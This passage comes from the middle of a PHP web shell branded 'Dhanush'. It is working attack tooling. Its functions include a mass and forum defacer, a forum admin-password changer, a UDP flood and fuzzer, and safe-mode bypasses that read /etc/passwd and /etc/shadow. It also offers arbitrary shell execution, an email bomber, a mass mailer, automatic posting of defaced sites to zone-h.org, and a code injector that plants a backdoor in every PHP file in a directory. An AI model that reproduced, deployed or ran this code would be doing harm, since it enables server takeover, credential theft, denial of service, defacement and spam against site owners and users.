4088 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/includes/config.php");
4089 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4090 changeindexvb($conf,$_REQUEST['massdef']);
4091 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/vb/configuration.php");
4092 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4093 changeindexvb($conf,$_REQUEST['massdef']);
4094 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/forum/configuration.php");
4095 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4096 changeindexvb($conf,$_REQUEST['massdef']);
4097 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/core/configuration.php");
4098 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4099 changeindexvb($conf,$_REQUEST['massdef']);
4100 $conf = @file_get_contents($url."dhanush/root/home/".$matches."/public_html/vb/core/configuration.php");
4101 if(entre2v2($conf,"['MasterServer']['username'] = '","';"))
4102 changeindexvb($conf,$_REQUEST['massdef']);
4103 changeindexvb($conf,$_REQUEST['massdef']);
4104 }
4105 fclose($file);
4106 }
4107 }
4108 }
4109 echo "</table><center>";
4110 }
4111 else
4112 echo "<center>Cannot do mass deface</center>";
4113}
4114else if(isset($_REQUEST["defaceforum"]))
4115{
4116 ?>
4117 <center><div id="showdeface"></div>
4118 <font size="4">Forum Index Changer</font>
4119 <form action="<?php echo $self; ?>" method = "POST">
4120 <input type="hidden" name="forum">
4121 <input type="hidden" name="defaceforum">
4122 <table class=btmtbl border = "1" width="60%" style="text-align: center;" align="center">
4123 <tr>
4124 <td height="50" width="50%"> Host : <input class="sbox" type="text" name="f1" size="20" value="localhost"></td>
4125
4126 <td width="50%"> Database : <input type ="text" class="sbox" name = "f2" size="20"></td></tr>
4127 <tr><td height="50" width="50%">User : <input type ="text" class="sbox" name = "f3" size="20"> </td>
4128 <td> Password : <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
4129
4130 <tr><td height="50" width="50%">Type :
4131 <select class=sbox id="forumdeface" name="forumdeface" onChange="checkforum(this.value)">
4132 <option value="vb">vbulletin</option>
4133 <option value="mybb">Mybb</option>
4134 <option value="smf">SMF</option>
4135 <option value="ipb">IPB</option>
4136 <option value="wp">Wordpress</option>
4137 <option value="joomla">Joomla</option>
4138 </select></td>
4139 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td></td>
4140
4141 </tr>
4142 <tr>
4143 <td height="167" width="50%" colspan=2>
4144 <div style="display:none;" id="myjoomla"><p><b>Site URL : </b><input class="box" type="text" id="siteurl" name="siteurl" width="80" value="http://site.com/administrator/"></p></div>
4145
4146 <div style="display:none;" id="smfipb"><p align="center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" value="Hacked"> <b>Kate ID : </b><input class="sbox" type="text" name="f5" size="20" value="1">
4147
4148 </div>
4149
4150 <p align="center"> <textarea class="box" name="index" cols=53 rows=8><b>lol ! You Are Hacked !!!!</b></textarea><p align="center">
4151 <input type="button" onClick="forumdefacefn(index.value,f1.value,f2.value,f3.value,f4.value,forumdeface.value,tableprefix.value,siteurl.value,head.value,f5.value)" class="but" value = "Hack It">
4152 </td>
4153 </tr>
4154 </table>
4155 </form>
4156 </center>
4157 <?php
4158 }
4159 else if(isset($_GET["passwordchange"]))
4160 {
4161 echo "<center>";
4162 ?>
4163 <div id="showchangepass"></div>
4164 <font size="4">Forum Password Changer</font>
4165 <form onSubmit="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uname.value,newpass.value);return false;">
4166 <table class=btmtbl border = "1" width="60%" height="246" style="text-align: center;" align="center">
4167 <tr>
4168 <td height="50" width="50%"> Host : <input class="sbox" type="text" name="f1" size="20" value="localhost"></td><td height="50" width="50"> DataBase : <input type ="text" class="sbox" name = "f2" size="20"></td> <tr><td height="50" width="50%"> User : <input type ="text" class="sbox" name = "f3" size="20"></td><td height="50" width="50%"> Password : <input class="sbox" type ="text" name = "f4" size="20"></td></tr>
4169 <tr>
4170 <td height="50" width="50%">Type :
4171 <select class=sbox id="forums" name="forums" onChange="showMsg(this.value)">
4172 <option value="vb">vbulletin</option>
4173 <option value="mybb">Mybb</option>
4174 <option value="smf">SMF</option>
4175 <option value="ipb">IPB</option>
4176 <option value="phpbb">PHPBB</option>
4177 <option value="wp">Wordpress</option>
4178 <option value="joomla">Joomla</option>
4179 </select></td>
4180 <td height="50" width="50%">Prefix : <input type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
4181 </tr>
4182 <tr>
4183 <td colspan=2 height="100" width="780">
4184
4185 <p align="center"><div id="fid" style="display:block;">User ID : <input class="sbox" type="text" name="ipbuid" size="20" value="1"> New Password : <input type ="text" class="sbox" name = "newipbpass" size="20" value="hacked"></div>
4186
4187 <div id="joomla" style="display:none;">New Username : <input style="width:170px;" class="box" type="text" name="username" size="20" value="admin"> New Password : <input type ="text" class="sbox" name = "newjoomlapass" size="20" value="hacked"></div>
4188
4189 <div id="wpress" style="display:none;"><p>New Username : <input style="width:170px;" class="box" type="text" name="uname" size="20" value="admin"> New Password : <input type ="text" class="sbox" name = "newpass" size="20" value="hacked"></p></div>
4190
4191 <p><input type = "button" onClick="changeforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,uname.value,newpass.value)" class="but" value = " Change IT " name="forumpass"></p></td>
4192 </tr>
4193 </table>
4194 </form>
4195 </center>
4196 <?php
4197}
4198else if(isset($_GET['dosser']))
4199{
4200 if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &&
4201 $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['timeout'] != "" && $_GET['exTime'] != "" )
4202 {
4203 $IP=$_GET['ip'];
4204 $port=$_GET['port'];
4205 $executionTime = $_GET['exTime'];
4206 $no0fBytes = $_GET['no0fBytes'];
4207 $data = "";
4208 $timeout = $_GET['timeout'];
4209 $packets = 0;
4210 $counter = $no0fBytes;
4211 $maxTime = time() + $executionTime;;
4212 while($counter--)
4213 {
4214 $data .= "X";
4215 }
4216 $data .= " Dhanush";
4217
4218 while(1)
4219 {
4220 $socket = fsockopen("udp://$IP", $port, $error, $errorString, $timeout);
4221 if($socket)
4222 {
4223 fwrite($socket , $data);
4224 fclose($socket);
4225 $packets++;
4226 }
4227 if(time() >= $maxTime)
4228 {
4229 break;
4230 }
4231 }
4232 echo "Dos Completed!<br>";
4233 echo "DOS attack against udp://$IP:$port completed on ".date("h:i:s A")."<br />";
4234 echo "Total Number of Packets Sent : " . $packets . "<br />";
4235 echo "Total Data Sent = ". HumanReadableFilesize($packets*$no0fBytes) . "<br />";
4236 echo "Data per packet = " . HumanReadableFilesize($no0fBytes) . "<br />";
4237 }
4238}
4239else if(isset($_GET['fuzzer']))
4240{
4241 if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout']) && isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multiplier']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] != "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "")
4242 {
4243 $IP=$_GET['ip'];
4244 $port=$_GET['port'];
4245 $times = $_GET['exTime'];
4246 $timeout = $_GET['timeout'];
4247 $send = 0;
4248 $ending = "";
4249 $multiplier = $_GET['multiplier'];
4250 $data = "";
4251 $mode="tcp";
4252 $data .= "GET /";
4253 $ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
4254 if($_GET['type'] == "tcp")
4255 {
4256 $mode = "tcp";
4257 }
4258
4259 while($multiplier--)
4260
4261 {
4262 $data .= urlencode($_GET['no0fBytes']);
4263 }
4264 $data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
4265 $data .= "by-Dhanush".$ending;
4266 $length = strlen($data);
4267
4268
4269 echo "Sending Data :- <br /> <p align='center'>$data</p>";
4270
4271 for($i=0;$i<$times;$i++)
4272 {
4273 $socket = fsockopen("$mode://$IP", $port, $error, $errorString, $timeout);
4274 if($socket)
4275 {
4276 fwrite($socket , $data , $length );
4277 fclose($socket);
4278 }
4279 }
4280 echo "Fuzzing Completed!<br>";
4281 echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A")."<br />";
4282 echo "Total Number of Packets Sent : " . $times . "<br />";
4283 echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br />";
4284 echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
4285 }
4286}
4287else if(isset($_GET['bypassit']))
4288{
4289 echo "<BR>";
4290 if(isset($_GET['copy']))
4291 {
4292 if(@copy($_GET['copy'],"test1.php"))
4293 {
4294 $fh=fopen("test1.php",'r');
4295 echo "<textarea cols=100 rows=20 class=box readonly>".htmlspecialchars(@fread($fh,filesize("test1.php")))."</textarea>";
4296 @fclose($fh);
4297 unlink("test1.php");
4298 }
4299 }
4300 else if(isset($_GET['filecontents']))
4301 {
4302 echo "<textarea cols=100 rows=20 class=box readonly>";
4303 echo file_get_contents($_GET['filecontents']);
4304 echo "</textarea>";
4305 }
4306 else if(isset($_GET['stream']))
4307 {
4308 echo "<textarea cols=100 rows=20 class=box readonly>";
4309 $file=$_GET['stream'];
4310 if ($stream = fopen($file, 'r')) {
4311 echo stream_get_contents($stream, -1, 0);
4312 fclose($stream);
4313 }
4314
4315 echo "</textarea>";
4316 }
4317 else if(isset($_GET['curl']))
4318 {
4319 $ch=curl_init("file://" . $_GET[curl]);
4320 curl_setopt($ch,CURLOPT_HEADERS,0);
4321 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
4322 $file_out=curl_exec($ch);
4323 curl_close($ch);
4324 echo "<textarea cols=100 rows=20 class=box readonly>".htmlspecialchars($file_out)."</textarea>";
4325 }
4326 else if(isset($_GET['include']))
4327 {
4328 if(file_exists($_GET['include']))
4329 {
4330 echo "<textarea cols=100 rows=20 class=box readonly>";
4331 @include($_GET['include']);
4332 echo "</textarea>";
4333 }
4334 else
4335 echo "<br><center><font size=3>Can't Read" . $_GET['include'] . "</font></center>";
4336 }
4337 else if(isset($_GET['id']))
4338 {
4339 echo "<textarea cols=100 rows=20 class=box readonly>";
4340 for($uid=0;$uid<60000;$uid++)
4341 {
4342 $ara = posix_getpwuid($uid);
4343 if (!empty($ara))
4344 {
4345 while (list ($key, $val) = each($ara))
4346 {
4347 print "$val:";
4348 }
4349 print "\n";
4350 }
4351 }
4352 echo "</textarea>";
4353 }
4354 else if(isset($_GET['tempnam']))
4355 {
4356 echo "<textarea cols=100 rows=20 class=box readonly>";
4357 $mytmp = tempnam ( 'tmp', $_GET['tempnam'] );
4358 $fp = fopen ( $mytmp, 'r' );
4359 while(!feof($fp))
4360 echo fgets($fp);
4361 fclose ( $fp );
4362 echo "</textarea>";
4363 }
4364 else if(isset($_GET['symlnk']))
4365 {
4366 echo "<textarea cols=100 rows=20 class=box readonly>";
4367 @mkdir("mydhanush",0777);
4368 @chdir("mydhanush");
4369 execmd("ln -s /etc/passwd");
4370
4371 echo file_get_contents($curr_url . "/mydhanush/passwd");
4372 echo "</textarea>";
4373 }
4374 if(isset($_GET['newtype']))
4375 {
4376 $filename = $_GET['newtype'];
4377 echo "<textarea cols=100 rows=20 class=box readonly>";
4378 if($_GET['optiontype'] == "xxd")
4379 echo execmd("xxd ".$filename);
4380 else if($_GET['optiontype'] == "rev")
4381 echo execmd("rev ".$filename);
4382 if($_GET['optiontype'] == "tac")
4383 echo execmd("tac ".$filename);
4384 if($_GET['optiontype'] == "more")
4385 echo execmd("more ".$filename);
4386 if($_GET['optiontype'] == "less")
4387 echo execmd("less ".$filename);
4388 if($_GET['optiontype'] == "awk")
4389 echo execmd("awk '{ print }' ".$filename);
4390 echo "</textarea>";
4391 }
4392 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 2px;" /><BR><BR><BR>';
4393}
4394// Deface Website
4395else if(isset($_GET['deface']))
4396{
4397 $myfile = fopen($_GET['deface'],'w');
4398 if(fwrite($myfile, base64_decode($ind)))
4399 {fclose($myfile);
4400 echo "Index Defaced Successfully";}
4401 else
4402 echo "Donot have write permission";
4403}
4404else if(isset($_GET['perms']))
4405{
4406?><br>
4407 <form>
4408 <input type="hidden" name="myfilename" value="<?php echo $_GET['myfilepath']; ?>">
4409 <table align="center" border="1" style="width:40%;border-color:#333333;border-collapse:collapse;">
4410 <tr>
4411 <td style="height:40px" align="right">Change Permissions </td><td align="center"><input value="0755" name="chmode" class="sbox" /></td>
4412 </tr>
4413 <tr>
4414 <td colspan="2" align="center" style="height:60px">
4415 <input type="button" onClick="changeperms(chmode.value,myfilename.value)" value="Change Permission" class="but" style="padding: 5px;" />
4416 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" />
4417 </td>
4418 </tr>
4419 </table>
4420
4421 </form>
4422 <?php
4423}
4424else if(isset($_GET["chmode"]))
4425{
4426 if($_GET['chmode'] != null && is_numeric($_GET['chmode']))
4427 {
4428 echo '<br>';
4429 $perms = 0;
4430 for($i=strlen($_GET['chmode'])-1;$i>=0;--$i)
4431 $perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$i-1));
4432 if(@chmod($_GET['myfilename'],$perms))
4433 echo "<center><blink><font class=txt>File Permissions Changed Successfully</font></blink></center>";
4434 else
4435 echo "<center><blink>Cannot Change File Permissions</blink></center>";
4436 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" /><BR><BR>';
4437 }
4438}
4439else if(isset($_GET['rename']))
4440{
4441?><BR>
4442 <form>
4443 <table border="0" cellpadding="7" cellspacing="3">
4444 <tr>
4445 <td>File </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="file" class="box" /></td>
4446 </tr>
4447 <tr>
4448 <td>To </td><td><input value="<?php echo $_GET['myfilepath'];?>" name="to" class="box" /></td>
4449 </tr>
4450 <tr>
4451 <td colspan="2"><input type="button" onClick="renamefun(file.value,to.value)" value="Rename It" class="but" style="margin-left: 160px;padding: 5px;"/>
4452 <input type="button" onClick="cancel()" value="cancel" class="but" style="padding: 5px;" />
4453 </td>
4454 </tr>
4455 </table>
4456 </form>
4457 <?php
4458
4459}
4460else if(isset($_GET['renamemyfile']))
4461{
4462 if(isset($_GET['to']) && isset($_GET['file']))
4463 {
4464 echo '<br>';
4465 if(!rename($_GET['file'], $_GET['to']))
4466 echo "Cannot Rename File";
4467 else
4468 echo "<font class=txt>File Renamed Successfully</font>";
4469 echo '<br><input type="button" onClick="cancel()" value=" OK " class="but" style="padding: 5px;" /><BR><BR>';
4470 }
4471}
4472else if(isset($_GET['open']))
4473{
4474 if(is_file($_GET['myfilepath']))
4475 {
4476 $owner = "0/0";
4477 if($os == "Linux")
4478 $owner = getOGid($_GET['myfilepath']);
4479 ?>
4480 <form>
4481 <table style="width:57%;">
4482 <tr align="left">
4483 <td align="left">File : </td><td><font class=txt><?php echo $_GET['myfilepath'];?></font></td><td align="left">Permissions : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo addslashes($_GET['myfilepath']); ?>')"><?php echo filepermscolor($_GET['myfilepath']);?></a></td>
4484 </tr>
4485 <tr>
4486 <td>Size : </td><td><?php echo HumanReadableFileSize(filesize($_GET['myfilepath']));?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
4487 </tr>
4488 </table>
4489 <textarea name="content" rows="15" cols="100" class="box"><?php
4490 $content = htmlspecialchars(file_get_contents($_GET['myfilepath']));
4491 if($content)
4492 {
4493 echo $content;
4494 }
4495 else if(function_exists('fgets') && function_exists('fopen') && function_exists('feof'))
4496 {
4497 if(filesize($_GET['myfilepath']) != 0 )
4498 {
4499 fopen($_GET['myfilepath']);
4500 while(!feof())
4501 {
4502 echo htmlspecialchars(fgets($_GET['myfilepath']));
4503 }
4504 }
4505 }
4506
4507 ?>
4508 </textarea><br />
4509 <input name="save" type="button" onClick="savemyfile('<?php echo addslashes($_GET['myfilepath']); ?>',content.value)" value="Save Changes" id="spacing" class="but"/>
4510 <input name="save" type="button" onClick="cancel()" value="Cancel" id="spacing" class="but"/>
4511 </form>
4512 <?php
4513 }
4514 else
4515 echo '<BR><input name="save" type="button" onClick="cancel()" value=" OK " id="spacing" class="but"/><BR>File does not exist !!!!<BR>';
4516}
4517else if(isset($_POST['file']) && isset($_POST['content']))
4518{
4519 echo '<BR>';
4520 if(file_exists($_POST['file']))
4521 {
4522 $handle = fopen($_POST['file'],"w");
4523 if(fwrite($handle,$_POST['content']))
4524 echo "<font class=txt>File Saved Successfully!</font>";
4525 else
4526 echo "Cannot Write into File";
4527 }
4528 else
4529 {
4530 echo "File Name Specified does not exists!";
4531 }
4532 echo '<BR><input type="button" onClick="cancel()" value=" OK " class="but" /><BR><BR>';
4533}
4534else if(isset($_POST["SendNowToZoneH"]))
4535{
4536 $hacker = $_POST['defacer'];
4537 $method = $_POST['hackmode'];
4538 $neden = $_POST['reason'];
4539 $site = $_POST['domain'];
4540
4541 if (empty($hacker))
4542 {
4543 die("<center><font size=3>[-] You Must Fill the Attacker name !</font></center>");
4544 }
4545 elseif($method == "--------SELECT--------")
4546 {
4547 die("<center><font size=3>[-] You Must Select The Method !</center>");
4548 }
4549 elseif($neden == "--------SELECT--------")
4550 {
4551 die("<center><font size=3>[-] You Must Select The Reason</center>");
4552 }
4553 elseif(empty($site))
4554 {
4555 die("<center><font size=3>[-] You Must Inter the Sites List !</center>");
4556 }
4557 // Zone-h Poster
4558 function ZoneH($url, $hacker, $hackmode,$reson, $site )
4559 {
4560 $k = curl_init();
4561 curl_setopt($k, CURLOPT_URL, $url);
4562 curl_setopt($k,CURLOPT_POST,true);
4563 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
4564 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
4565 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
4566 $kubra = curl_exec($k);
4567 curl_close($k);
4568 return $kubra;
4569 }
4570
4571 $i = 0;
4572 $sites = explode("\n", $site);
4573 echo "<pre class=ml1 style='margin-top:5px'>";
4574 while($i < count($sites))
4575 {
4576 if(substr($sites[$i], 0, 4) != "http")
4577 {
4578 $sites[$i] = "http://".$sites[$i];
4579 }
4580 ZoneH("http://zone-h.org/notify/single", $hacker, $method, $neden, $sites[$i]);
4581 echo "<font class=txt size=3>Site : ".$sites[$i]." Posted !</font><br>";
4582 ++$i;
4583 }
4584
4585 echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed Successfully !! </font></pre>";
4586}
4587else if(isset($_GET['executemycmd']))
4588{
4589 $comm = $_GET['executemycmd'];
4590 chdir($_GET['executepath']);
4591 echo shell_exec($comm);
4592}
4593// View Passwd file
4594else if(isset($_GET['passwd']))
4595{
4596 $test='';
4597 $tempp= tempnam($test, "cx");
4598 $get = "/etc/passwd";
4599 $name=@posix_getpwuid(@fileowner($get));
4600 $group=@posix_getgrgid(@filegroup($get));
4601 $owner = $name['name']. " / ". $group['name'];
4602 ?>
4603 <table style="width:57%;">
4604 <tr>
4605 <td align="left">File : </td><td><font class=txt><?php echo $get; ?></font></td><td align="left">Permissions : </td><td><?php echo filepermscolor($get);?></td>
4606 </tr>
4607 <tr>
4608 <td>Size : </td><td><?php echo filesize($get);?></td><td>Owner/Group : </td><td><font class=txt><?php echo $owner;?></font></td>
4609 </tr>
4610 </table>
4611 <?php
4612 if(copy("compress.zlib://".$get, $tempp))
4613 {
4614 $fopenzo = fopen($tempp, "r");
4615 $freadz = fread($fopenzo, filesize($tempp));
4616 fclose($fopenzo);
4617 $source = htmlspecialchars($freadz);
4618 echo "<tr><td><center><textarea rows='20' cols='80' class=box name='source'>$source</textarea><br>";
4619 unlink($tempp);
4620 }
4621 else
4622 {
4623 ?>
4624 <form>
4625 <input type="hidden" name="etcpasswd">
4626 <table class="tbl" border="1" cellpadding="5" cellspacing="5" align="center" style="width:40%;">
4627 <tr>
4628 <td>From : </td><td><input type="text" name="val1" class="sbox" value="1"></td>
4629 </tr>
4630 <tr>
4631 <td>To : </td><td><input type="text" name="val2" class="sbox" value="1000"></td>
4632 </tr>
4633 <tr>
4634 <td colspan="2" align="center"><input type="submit" value=" Go " class="but"></td>
4635 </tr>
4636 </table><br>
4637 </form>
4638 <?php
4639 }
4640 ?>
4641 <br />
4642 <input type="button" onClick="cancel()" value=" OK " class="but" /><BR><BR>
4643 <?php
4644}
4645else if(isset($_GET['shadow']))
4646{
4647 $test='';
4648 $tempp= tempnam($test, "cx");
4649 $get = "/etc/shadow";
4650 if(copy("compress.zlib://".$get, $tempp))
4651 {
4652 $fopenzo = fopen($tempp, "r");
4653 $freadz = fread($fopenzo, filesize($tempp));
4654 fclose($fopenzo);
4655 $source = htmlspecialchars($freadz);
4656 echo "<tr><td><center><font size='3' face='Verdana'>$get</font><br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
4657 unlink($tempp);
4658 }
4659}
4660else if(isset($_GET['bomb']))
4661{
4662 ?><div id="showmail"></div>
4663 <form>
4664 <table id="margins" style="width:100%;">
4665 <tr>
4666 <td style="width:30%;">To</td>
4667 <td>
4668 <input class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/>
4669 </td>
4670 </tr>
4671 <tr>
4672
4673 <td style="width:30%;">Subject</td>
4674 <td>
4675 <input type="text" class="box" name="subject" value="Dhanush Here!" onFocus="if(this.value == 'Dhanush Here!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!';" />
4676 </td>
4677 </tr>
4678 <tr>
4679 <td style="width:30%;">No. of Times</td>
4680 <td>
4681 <input class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';"/>
4682 </td>
4683 </tr>
4684 <tr>
4685 <td style="width:30%;">Pad your message (Less spam detection)</td>
4686 <td><input type="checkbox" name="padding"/></td>
4687 </tr>
4688 <tr>
4689 <td colspan="2"><textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!</textarea></td>
4690 </tr>
4691 <tr>
4692 <td rowspan="2">
4693 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('dobombing',to.value,subject.value,message.value,'null',times.value,padding.value)" class="but" value=" Bomb! "/>
4694 </td>
4695 </tr>
4696 </table>
4697 </form>
4698 <?php
4699}
4700
4701//Mass Mailer
4702else if(isset($_GET['mail']))
4703{
4704 ?><div id="showmail"></div>
4705 <div align="left">
4706 <form>
4707 <table align="left" style="width:100%;">
4708 <tr>
4709 <td style="width:10%;">From</td>
4710 <td style="width:80%;" align="left"><input name="from" class="box" value="Hello@abcd.in" onFocus="if(this.value == 'Hello@abcd.in')this.value = '';" onBlur="if(this.value=='')this.value='Hello@abcd.in';"/></td>
4711 </tr>
4712
4713 <tr>
4714 <td style="width:20%;">To</td>
4715 <td style="width:80%;"><input class="box" class="box" name="to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain.com,victim2@domain.com';"/></td>
4716 </tr>
4717
4718 <tr>
4719 <td style="width:20%;">Subject</td>
4720 <td style="width:80%;"><input type="text" class="box" name="subject" value="Dhanush Here!!" onFocus="if(this.value == 'Dhanush Here!!')this.value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!!';" /></td>
4721 </tr>
4722
4723
4724 <tr>
4725 <td colspan="2">
4726 <textarea name="message" cols="110" rows="10" class="box">Hello !! This is Dhanush!!! Patch your site.....</textarea>
4727 </td>
4728 </tr>
4729
4730
4731 <tr>
4732 <td rowspan="2">
4733 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="sendmail('massmailing',to.value,subject.value,message.value,from.value)" class="but" value=" Send! "/>
4734 </td>
4735 </tr>
4736 </table>
4737 </form></div>
4738 <?php
4739}
4740// Get Domains
4741else if(isset($_REQUEST["symlinkserver"]))
4742{
4743 ?>
4744 <center><table><tr>
4745 <td><a href=javascript:void(0) onClick="getdata('perlsymlink')"><font class=txt><b>| Perl Symlink |</b></font></a></td>
4746 <td><a href=javascript:void(0) onClick="getdata('symlink')"><font class=txt><b>| Symlink Server |</b></font></a></td>
4747 <td><a href=javascript:void(0) onClick="getdata('symlinkfile')"><font class=txt><b>| Symlink File |</b></font></a></td>
4748 <td><a href=javascript:void(0) onClick="getdata('script')"><font class=txt><b>| Script Locator |</b></font></a></td>
4749 </tr></table></center><br>
4750 <div id="showdata"></div><?php
4751}
4752// Forum Manager
4753else if(isset($_REQUEST["forum"]))
4754{ ?>
4755 <center><table><tr><td><a href=# onClick="getdata('defaceforum')"><font class=txt size="4">| Forum Defacer |</font></a></td>
4756 <td><a href=# onClick="getdata('passwordchange')"><font class=txt size="4">| Forum Password Changer |</font></a></td>
4757 <td><a href=# onClick="getdata('massdeface')"><font class=txt size="4">| Mass Defacer |</font></a></td>
4758 </tr></table></center><br><div id="showdata"></div>
4759 <?php
4760}
4761// Sec info
4762else if(isset($_GET['secinfo']))
4763{ ?><div id=showdata></div>
4764<center><div id="showmydata"></div>
4765</center>
4766<br><center><font size=5>Server security information</font><br><br></center>
4767 <table class="btmtbl" style="width:100%;" border="1">
4768 <tr>
4769 <td style="width:7%;">Curl</td>
4770 <td style="width:7%;">Oracle</td>
4771 <td style="width:7%;">MySQL</td>
4772 <td style="width:7%;">MSSQL</td>
4773 <td style="width:7%;">PostgreSQL</td>
4774 <td style="width:12%;">Open Base Directory</td>
4775 <td style="width:10%;">Safe_Exec_Dir</td>
4776 <td style="width:7%;">PHP Version</td>
4777 <td style="width:7%;">Magic Quotes</td>
4778 <td style="width:7%;">Server Admin</td>
4779 </tr>
4780 <tr>
4781 <td style="width:7%;"><font class="txt"><?php curlinfo(); ?></font></td>
4782 <td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></font></td>
4783 <td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></font></td>
4784 <td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></font></td>
4785 <td style="width:7%;"><font class="txt"><?php postgresqlinfo(); ?></font></td>
4786 <td style="width:12%;"><font class="txt"><?php echo $basedir; ?></font></td>
4787 <td style="width:10%;"><font class="txt"><?php if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font >NONE</font></b>";}else {echo "<font class='txt'>$df</font></b>";};} ?></font></td>
4788 <td style="width:7%;"><font class="txt"><?php phpver(); ?></font></td>
4789 <td style="width:7%;"><font class="txt"><?php magic_quote(); ?></font></td>
4790 <td style="width:7%;"><font class="txt"><?php serveradmin(); ?></font></td>
4791 </tr>
4792</table><br> <?php
4793 mysecinfo();
4794}
4795// Code Injector
4796
4797else if(isset($_GET['injector']))
4798{
4799 if($os != "Windows")
4800 $injectcode = "WU91ciBVcGxvYWQzUiBuMDBi=";
4801 else
4802 {
4803 $injectcode = "WU91ciBVcGxvYWQzUiBuMDBi=";
4804 }
4805 ?>
4806 <form method='POST'>
4807 <table id="margins">
4808 <tr>
4809 <td width="100" class="title">
4810 Directory
4811 </td>
4812 <td>
4813 <input class="box" name="pathtomass" value="<?php echo getcwd().$SEPARATOR; ?>" />
4814 </td>
4815
4816 </tr>
4817 <tr>
4818 <td class="title">
4819 Mode
4820 </td>
4821 <td>
4822 <select style="width: 400px;" name="mode" class="box">
4823 <option value="Apender">Apender</option>
4824 <option value="Overwriter">Overwriter</option>
4825 </select>
4826 </td>
4827 </tr>
4828 <tr>
4829 <td class="title">
4830 File Type
4831 </td>
4832 <td>
4833 <input type="text" class="box" name="filetype" value="php" onBlur="if(this.value=='')this.value='php';" />
4834 </td>
4835 </tr>
4836 <tr>
4837 <td>Create A backdoor by injecting this code in every php file of current directory</td>
4838 </tr>
4839
4840 <tr>
4841 <td colspan="2"><?php if($os == "Windows"){echo "<i>Default Password is : <b>Dhanush</b> (change to yours using MD5)</i> Example : .php?dhpasswd=Dhanush";}else{if(!function_exists('system')){echo "system() function disabled";}} ?><BR>
4842 <textarea name="injectthis" cols="110" rows="10" class="box"><?php echo base64_decode($injectcode); ?></textarea>
4843 </td>
4844 </tr>
4845 <tr>
4846 <td rowspan="2">
4847 <input style="margin : 20px; margin-left: 390px; padding : 10px; width: 100px;" type="button" onClick="codeinjector(pathtomass.value,mode.value,filetype.value,injectthis.value)" class="but" value="Inject "/>
4848 </td>
4849 </tr>
4850 </form>
4851 </table><div id="showinject"</div>
4852 <?php
4853}
4854// Bypass
4855else if(isset($_GET["bypass"]))
4856{
4857 ?><center><div id="showmydata"></div></center>
4858 <table cellpadding="7" align="center" border="3" style="width:70%;border-color:#333333;border-collapse:collapse;">
4859 <tr>
4860 <td align="center" colspan="2"><font size="3">Safe mode bypass</font></td>
4861 </tr>
4862 <tr>
4863 <td align="center">
4864 <p>Using copy() function</p>
4865 <form onSubmit="bypassfun('copy',copy.value);return false;">
4866 <input type="text" name="copy" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('copy',copy.value)" value="bypass" class="but">
4867 </form>
4868 </td>
4869 <td align="center">
4870 <p>Using File contents function</p>
4871 <form onSubmit="bypassfun('filecontents',filecontents.value);return false;">
